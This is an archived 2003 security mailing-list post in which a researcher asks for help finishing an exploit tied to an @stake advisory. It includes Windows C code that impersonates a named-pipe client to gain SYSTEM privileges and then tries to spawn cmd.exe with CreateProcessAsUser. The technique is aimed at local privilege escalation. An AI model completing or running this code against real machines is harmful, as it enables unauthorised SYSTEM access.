Named Pipe Impersonation -> CreateProcessAsUser();

From: wirepair (
Date: 07/14/03

  • Next message: Blue Boar: "Re: Named Pipe Impersonation -> CreateProcessAsUser();"
    Date: Mon, 14 Jul 2003 12:45:37 -0700

    Hello, I'm attempting to finish up my exploit for the
    @stake advisory. I've hit quite a snag when I found out
    that calling a new process does not inherit the privileges
    of the named pipe. (I must have been thinking of fork() or
    something heh). So I can impersonate SYSTEM, but I can not
    create a new process with these nice privileges. Here is
    where I am at:

        ConnectNamedPipe() <-- yada yada wait for connection

        // impersonate the pipe so we now are SYSTEM.
        if (!ImpersonateNamedPipeClient (hPipe)) {
            printf ("Failed to impersonate the named pipe.\n");
            return 5;
        }

        // found this on msdn, i'm trying to get a token with full
        // access, then call CreateProcessAsUser();
        if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, TRUE, &hToken )) {
            if (hToken != INVALID_HANDLE_VALUE) {
                printf("damn: %u\n", GetLastError());
            }
        }

        MapGenericMask( &dwAccessDesired, pGeneric );

    This I'm kinda shady on, looks like I'm just mapping the id to the
    SYSTEM name? When I call GetUserName I get garble after
    the OpenThreadToken unless I call MapGenericMask...

        CreateProcessAsUser(hToken, "cmd.exe",
            NULL, NULL, NULL, true, NULL, NULL, NULL, &si, &pi);

    Now I call CreateProcessAsUser, using the token from
    OpenThreadToken. In the debugger, it tries to execute cmd,
    but I get nothing back... If anyone wants to see my
    code it's at

    Thanks, this is starting to bug me :),
